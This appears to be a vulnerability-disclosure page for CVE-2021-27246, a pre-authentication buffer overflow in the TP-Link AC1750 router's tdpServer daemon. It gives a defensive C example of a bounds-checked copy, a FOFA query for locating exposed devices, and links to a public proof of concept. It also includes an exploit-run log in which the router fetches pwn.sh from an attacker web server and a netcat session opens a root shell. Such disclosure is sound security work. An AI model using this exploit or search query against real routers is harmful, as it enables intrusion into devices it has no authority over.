# TP-Link AC1750 Pre-Authentication Remote Code Execution Vulnerability (CVE-2021-27246)

2 KB / 2021-05-21 09:14:38

The tdpServer daemon on the TP-Link AC1750 does not check the size of incoming JSON data. This leads to a buffer overflow, and the overflow can be leveraged to achieve code execution.
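The root cause described above is a missing length check on attacker-controlled input. The C snippet below is an added illustration written for this page; it is not tdpServer's code and not the Synacktiv proof of concept. The message layout (`struct msg`), the `FIELD_MAX` buffer size and all function names are assumptions. It places the unchecked-copy pattern next to a bounded version that rejects an oversized field before the `memcpy` runs.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Hypothetical fixed-size destination for one JSON string field
 * (a constructed size; not the real tdpServer buffer layout). */
#define FIELD_MAX 32

/* Constructed model of a length-prefixed message: the sender declares how
 * many bytes of JSON follow. Both fields are under the sender's control. */
struct msg {
    uint32_t    json_len;
    const char *json;
};

/* "Before" pattern: the declared length drives the copy and is never compared
 * with the destination size. Shown for contrast only; deliberately not called. */
void copy_field_unchecked(char *dst, const struct msg *m)
{
    memcpy(dst, m->json, m->json_len);  /* json_len > FIELD_MAX overwrites adjacent stack memory */
    dst[m->json_len] = '\0';
}

/* Hardened pattern: the copy is bounded by the destination, not by the sender.
 * Returns 0 on success, -1 when the field does not fit (terminating NUL included). */
int copy_field_checked(char *dst, size_t dst_size, const struct msg *m)
{
    if (dst_size == 0 || m->json_len >= dst_size)
        return -1;                      /* reject instead of truncating silently */
    memcpy(dst, m->json, m->json_len);
    dst[m->json_len] = '\0';
    return 0;
}

/* Handler in the style of a daemon's receive path: copies the field into a
 * stack buffer and reports whether the message was accepted. */
int handle_message(const struct msg *m)
{
    char field[FIELD_MAX];
    if (copy_field_checked(field, sizeof field, m) != 0) {
        fprintf(stderr, "rejected: declared length %u exceeds %zu-byte buffer\n",
                m->json_len, sizeof field);
        return -1;
    }
    printf("accepted: %s\n", field);
    return 0;
}

/* Constructed input: a small, well-formed field that fits the buffer. */
int demo_short(void)
{
    const char *body = "{\"method\":\"onemesh\"}";
    struct msg m = { (uint32_t)strlen(body), body };
    return handle_message(&m);
}

/* Constructed input: a 199-byte field that the unchecked copy would have
 * written straight over the 32-byte stack buffer. */
int demo_long(void)
{
    static char big[200];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    struct msg m = { (uint32_t)strlen(big), big };
    return handle_message(&m);
}

int main(void)
{
    demo_short();   /* accepted */
    demo_long();    /* rejected by the length check */
    return 0;
}
```

The important design point is that the bound comes from `sizeof field` on the receiving side, never from the length the peer declares; a check that compares the declared length against another attacker-supplied value would not close the hole.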

FOFA:

```
app="TP_LINK-AC1750"
```

Vulnerability details: https://www.synacktiv.com/publications/pwn2own-tokyo-2020-defeating-the-tp-link-ac1750.html

PoC: https://github.com/synacktiv/CVE-2021-27246_Pwn2Own2020

```
$ bash exploit.sh 
[+] Launching web server for distribution of pwn.sh
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
INFO:tdpwn:Associating 49 onemesh clients...
INFO:tdpwn:Done!
    And wait for 80 seconds...
80 seconds left...
70 seconds left...
60 seconds left...
50 seconds left...
40 seconds left...
30 seconds left...
20 seconds left...
10 seconds left...
[+] Trying to exploit the tddp injection
INFO:tdp:Preparing tddpv1_configset payload
INFO:tdp:Sending payload

[+] Trying the root shell (Low probability of success...)
nc -v 192.168.0.1 12345
nc: connect to 192.168.0.1 port 12345 (tcp) failed: Connection refused

[ ] If shell hasn't succeed, don't worry, we retry 

INFO:tdpwn:Associating 49 onemesh clients...
INFO:tdpwn:Done!
    And wait for 80 seconds...
80 seconds left...
70 seconds left...
60 seconds left...
50 seconds left...
40 seconds left...
30 seconds left...
20 seconds left...
10 seconds left...
[+] Trying to exploit the tddp injection
INFO:tdp:Preparing tddpv1_configset payload
INFO:tdp:Sending payload
192.168.0.1 - - [30/Nov/2020 12:10:59] "GET /pwn.sh HTTP/1.1" 200 -

[+] Trying the root shell (High probability of success...)
nc -v 192.168.0.1 12345
Connection to 192.168.0.1 12345 port [tcp/*] succeeded!
uname -a
Linux ArcherA7v5 3.3.8 #1 Mon Sep 14 19:52:46 CST 2020 mips GNU/Linux
id
uid=0(root) gid=0(root)
^C[-] Stopping Webserver, now
Terminated
```

ref:

* https://www.synacktiv.com/public ... tp-link-ac1750.html
* https://github.com/synacktiv/CVE-2021-27246_Pwn2Own2020
* https://nvd.nist.gov/vuln/detail/CVE-2021-27246